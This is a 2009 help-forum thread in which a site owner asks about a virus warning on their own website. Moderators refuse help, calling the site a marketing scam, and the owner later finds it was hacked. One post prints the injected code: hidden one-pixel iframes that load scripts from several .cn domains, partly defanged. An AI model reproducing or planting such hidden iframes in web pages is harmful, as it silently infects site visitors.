Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

What can I do if I find my website has a virus


  • Please log in to reply

#1
dowsp

dowsp

    Member

  • Member
  • PipPipPip
  • 447 posts
Hello

I had a shook the other day.. :) :)

I had downloaded a new antivirus programme.. and when I clicked on my own website,
It found a virus..

Parts of The website has been set up by a 3 different people.. 2 more advanced webdesigners and me who can just about put a basic website togthers using basic html.

some of the site had included CSS style sheets.

I am confused how the website has caught the virus though...

I did not think the site alone could have carried one...

It does however have some images gifs/jpegs etc and a popup and some paypal payment buttons.

I am aware of philsing and Google needs to access a new site especially if one sets up an adwords account.

and will warn new people to the site until it has been accepted as being OK by them.

I just wondered if any one could advise me on how best to check it out.


thk you

dowsp
  • 0

Advertisements


#2
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,672 posts
Hi dowsp,

Can you PM me the link to your site?
And let us know which AV you are using?
Sometimes AntiVirus programs are supersensitive to scripts and give off a false alarm or warning when this is not really necessary.
So I'd like to have a look at your site, but don't post the URL in the open, just in case it is really infected.
I'll visit the site using a Virtual machine and look at the source code.

Regards,
  • 0

#3
dowsp

dowsp

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 447 posts
Hi Metallica,


Thank you for your reply,

I did not think anyone was going to be able to advise or help me with this problem.

I am not sure how you will check it without risk to the computer you use..
( or I am not sure what a Virtual Machine is ,At the moment unless I am overlooking the obvious)

The Anti virus Software was Avira... and since it found the virus, it has NOT worked.

I cannot open it at all... and I have uninstalled and reinstalled it. and it still will not open.

another Av programme also wont open.

Someone has or is trying to help me resolve this problem at the moment..
so far we have tried numerous things...to try and find out why Avira wont work.
and ran other various AV programmes such as spybot, AVZ, Dr web, and some others.

Otherwise my computer seems to be running very well..

BUT he is unable to offer seperate advise on the website and suggested I find someone who is more website conversent...

I can send a screen shot or details of what virus Avira found.

I will PM the link to you.

Many thanks

Dowsp
  • 0

#4
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,672 posts
Hi dowsp,

I'm sorry, but I am not inclined to help you scam innocent people.
I can't blame Avira for reporting that site.

All I can advise you to do is cancel your site and try to make an honest living.

Regards,
  • 0

#5
dowsp

dowsp

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 447 posts
[attachment=28617:IMC_virus.GIF]I meant to also say that, after Avira found the virus and I clicked on the remove it button..

it only offered me one OTHER option and that was Deny Access...

Upon clicking this to try and close Avira... I could NOT believe what happened next !

THE BOTTOM PART OF MY WEBSITE PAGE HAD DISAPPEARED !!! :)

This was where the paypal payment button links were..

This has really shocked me and I do not really know if it has deleted some of the html
on the bottom part of the page within the hosting inside part of my site.

I have attached a gif that shows what what Avira found..and the option it gave me.

it did infact find two things...one after i clicked on it the 1st time.

Edited by dowsp, 20 March 2009 - 04:17 PM.

  • 0

#6
dowsp

dowsp

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 447 posts
I have decided to delete the attachment just in case it may carry a virus.

I will only post it if you think it will be ok
  • 0

#7
dowsp

dowsp

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 447 posts
Hello

Can I ask who are you to judge if the website is selling dishonestly.

there are numerous websites that sell dvds.. about how to market on the internet

I really do think that you have reacted without knowing the full facts.
  • 0

#8
dowsp

dowsp

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 447 posts
Can I ask does that mean that you think anyone who sells information products on the internet
or has a website that one thinks doe not appeal to Google , Avira or who ever that that site
deserves to be destroyed by the virus and also that Avira will no long work on that persons website.

and can you tell me what is dishonest about the website ?

I want to respond to the comments and clear my own concerns.

The website refers to other experts earnings and not my own... what is wrong with that ?

I know there are many websites that are dishonest, BUT I do have a licence to sell a set of dvd recordings
of a major Internet seminar that took place in the USA and it was done by highly respected people in that
field...

SO unless you can tell me why this is dishonest and educate me..
MAYbe I am missing something that you are aware about that I do not know..

Maybe the people who sold the idea to me were dishonest and its like a chain.. I know some think that. and it is purely down to ones opinion...

BUT IT is NOT breaking any laws and its NOT like selling Porn of many other items that people believe are
wrong..

I could argue that NUMEROUS things we are sold everyday are dishonest or wrong..or misleading. and go on about many unfair things in life in general..

so unless you can give me some solid facts or educate me... I do not know why you take that approach to me or my website..

Not that long ago ( 12 months) Google did accept the website after an initial philsing issue... as I have not used adwords for some time its now gone back to how it was for some reason.

so unless you can prove what I am selling is a scam... I am concerned that you indicate what I am doing is wrong..

and why would what my website looks like ... get me a virus ? and why would it deserve it or you not blame Avira for reporting it... that is not google ?

I am not trying to be funny , I am just stating my facts...
-----------------------------------

I'm sorry, but I am not inclined to help you scam innocent people.
I can't blame Avira for reporting that site.

All I can advise you to do is cancel your site and try to make an honest living.

Edited by dowsp, 20 March 2009 - 06:02 PM.

  • 0

#9
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,672 posts
If I had been sure the website was completely your idea, you would have been banned from this site.
I'm willing to give you the benefit of the doubt and accept that you are a victim of a pyramid scam, but that doesn't mean I have to help keep the pyramid up. I have no interest in you making more victims.

Looking at your track record at this site, our staff has helped you several times to clean your computer.
Maybe you can see why I would suggest you get your computer security properly set up and go out to find a way to make an honest living.

I kindly request you to stop sending me PMs or expect me to help you. Your case has been brought before the administration of this forum and I will let them decide if they let you stay or not.
  • 0

#10
dowsp

dowsp

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 447 posts
Please define why its a pyramid scam ?

If a business creates a product.... Many sell the products on to a type of wholesaler,

they then sell them on to retailers and retailers sell the products to the public.

In the business or product that I sell...

Someone held a seminar with experts in their field and recorded the event..

They made copies of the dvds and offered to allow others to obtain a licence to sell the set of dvds of the event.

The Licence hold then has the right to sell on the product to the public.

It is a similar type of thing as I see it..

Is this illegal... If it is , please by all means, I would like you to educate me... and explain why you say its pyramid selling..

As far as I recall, Pyramid selling involved a chain where you continue to pass on to a continuous downline and also take a profit from the downline..

There is also another similar thing known as network marketing.. but this is legal !..

A company called Amway has done this very successfully and ethically for years.

This business I am involved with, only goes from the product creator of the product ( the person who set up the seminar and recorded it and produced the dvds of the event) to the licence holder ( me or who ever bought a licence to sell the product) then to the customer..


You also make judge ment on how I make a living... How do you know what else I do , whether I work a job,
work self employed, be it full or part time, on shifts , as a taxi driver or with in other various endevers or what ever. I may be on the sick or on holiday... or between contracts..

Edited by dowsp, 21 March 2009 - 07:54 PM.

  • 0

#11
dowsp

dowsp

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 447 posts
I have managed to get some advice of the virus problem..

and my site appears to have been hacked.

I have a few websites on various topics.. ( Not all Business related) and It seems that the index
pages have ALL been affected and the bottom part of the page is missing.


I was at a internet seminar last month with my laptop that involved some webdesign tuition... at a 3 day event and one of the technical experts was helping me of something and I often found him looking at my computer when I was accessing into my website.

Just as I was going to lunch , He asked to take a copy of a cd to a thumbdrive on my laptop when he had his own.. At the time I trusted him... but Later I wondered why he wanted to do it on my machine when he had his own.

He MAy have also noted my password when i entered it, when he was stood behind me...



this is a copy of some of the code I found, it looks suspicious to me.. hope its ok to post a sample.

I certainly dont recall cola cola being in my html...

I will change my password on my host account, I do have ftp software that i was using, but I am not sure about changing the acess details on that unless someone was using my laptop.

I have also altered some of the urls so hopefully the code could not be used in the wrong hands.

thank you



bgColor=#ffffff><iframe src="http:// hoamertration.cn/in.cgi?income11" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http:// dendigiedia.cn/in.cgi?cocacola93" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http:// betwager.cn/in.cgi?cocacola76" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http:// beager.cn/in.cgi?cocacola68" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http:// besron.cn/in.cgi?cocacola58" width=1 height=1 style="visibility: hidden"></iframe>

-------------

This was some advice that I was given to try and resolve the problem.

---------------------

Web Site Security Breaches
From
Jump to: navigation, search
Having your web site's security breached is never a fun thing to wake up and find in the morning. It can be a pain to deal with, so with that in mind, here are some helpful tips and suggestions on the steps you should take to get your web site back to normal.

Contents [hide]
1 Update Your Passwords
2 Scan Your C omputer for Viruses, Keyloggers, Malware and More
3 Clea n Up Your Web Site Files
4 Additi onal Resources


Update Your Passwords
The first thing you should do is update your hosting account password. When doing so, please make sure you are doing it from a known good machine (that could not have been infected). If not, then if you had a keylogger (for example) on your computer, it could grab the new password too. This can be done via the Customer Account Page:

How Do I Change My P assword?
You might also want to update your password for other Lunarpages services you are signed up for. You can check the A ccount and Control Panel Logins page for more information about all of our services you may have login information for. Main ones to remember would be our forum s ..... Do you have any scripts (like forums, blogs, galleries) that would use a user name and password to login to the administrator section? If so, you should update the password on any of them you have installed on your hosting account.

Scan Your Computer for Viruses, Keyloggers, Malware and More
There are many bad things that you may download on purpose or by accident on the Web that could effect your computer. There have been known cases where infected files could be uploaded to your hosting account by mistake too. Be sure to fully scan your computers with an anti-virus program.

There are many different ones to choose from, if you do not have one installed. Try T rend Micro's HouseCall. It runs from the browser, and scans your computer for viruses, spyware, or other malware.

Note that while windows is the most often targeted OS, Mac (and Linux/Unix with MacOSX as an extension of Unix) is not impervious and is starting to see more and more malware targeting it as its market share and popularity increases.

Clean Up Your Web Site Files
Another important step when it comes to dealing with web site security breaches is to get every last bit of the exploit to keep it from coming back. They usually plant a back door. You want to review your web site files and look for anything that does not belong, or you can not identify as being apart of your web site or scripts you have installed.

Here's the basic list of files/folders on new linux-based (Basic and Business) accounts:

/etc
/mail
/public_html
/public_html/cgi-bin
/public_html/.htaccess
/public_ftp
/tmp
/www
/.lastlogin
/.contactemail
You may also see the following, depending on your account activity:

/.fantasticodata
/.cpanel
/.cpanel-datastore
/.htpasswd
Additional Resources
  • 0

#12
dowsp

dowsp

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 447 posts
Here is a further update of what I found out about my website security / virus problem.

I contacted my websites hosting company and after speaking to them about my problem, INITIALLY it has put me off considering continueing with having a website or considering running a webbusiness.

This is because from their initial explanation suggested that it seems most websites are so easy to be attacked and to protect ones site is yet another whole act of learning or extra added expence... it just seems never ending !

I was told of a website that can do a free scan of the website...

http://www.acunetix.com/

I havent done this or read all about it as yet..but I believe tha also the site offers some sort of continuos protection if you pay for the service, but onlly in terms of alerting you... I DONT think that it can still protect
anyone from hacking the website... and to me this is VERY concerning....and does put me off risking going to all the expence and trouble of having a website and having information on ones site that may be accessable.

I thought that the site had been accessed by someone obtaining my username and password info to get in my sites through the Lunar pages host account. BUT I was told that this is not just the only way hackers can acess the site.. IF you have a webpage that has a OPT IN form... ie a webpage with form that allows visitors to leave their
name and email address details so that they can receive things like further information or free offers etc..
That hackers can use these pages to find information that gives them relevant information to either acess the website OR to somehow send a virus to the site..

THIS SEEMS TOTALLY UNPROTECTABLE ! and I am some what gutted to find this out !
It seems it could continue to happen.

I was also informed how to do a back up... initially obtaining a backup file.. then sending it to my pc to do a virus scan check... then reuploading it back and reinstalling it..

Unless someone knows of a much more secure way to protect ones website..
  • 0

#13
sari

sari

    GeekU Admin

  • Administrator
  • 20,955 posts
  • MVP
dowsp,

First off, I agree with Metallica that the site is nothing more than a marketing scam. Therefore, we have no desire to help you get it up and running. Secondly, given that the site is indeed infected, I recommend you take it offline immediately, as any one who visits it will undoubtedly get infected, just as you have been. You have a very long topic going on with Fenzodahl right now, and I recommend you complete that, and then put some serious time and effort into understanding the importance of computer security. You have had a number of topics open in our malware forum in the past, and you have abandoned all but one of them previously. Part of our final clean up is to offer advice on how to keep yourself safe on the internet. It appears from your logs you've had multiple antivirus programs running simultaneously, which is not a safe practice at all, as you're more likely to get infected and have other performance issues with your computer. You had to be instructed multiple times to uninstall AVG 7.5 and install something else, and that's not the only time you failed to follow directions. Once Fenzodahl has determined you're clean, I suggest you follow all the directions he gives you for protecting your computer. In the meantime, I suggest you read this topic. Given the issues you've had, I think you need much more protection than you've had in the past, including antispyware, firewall, and the MVPS Hosts File. I also suggest you use an alternative browser, such as Firefox, and some of the security add-ons that are recommended in that article. While the help we offer here is free, we get extremely frustrated when the same people return over and over again with infections, when there are many ways to protect yourself online. Please take advantage of all the information we have to share with you concerning protection - it doesn't only benefit you. Every time you get infected you run the risk of infecting others as well.

Thanks,

sari
  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP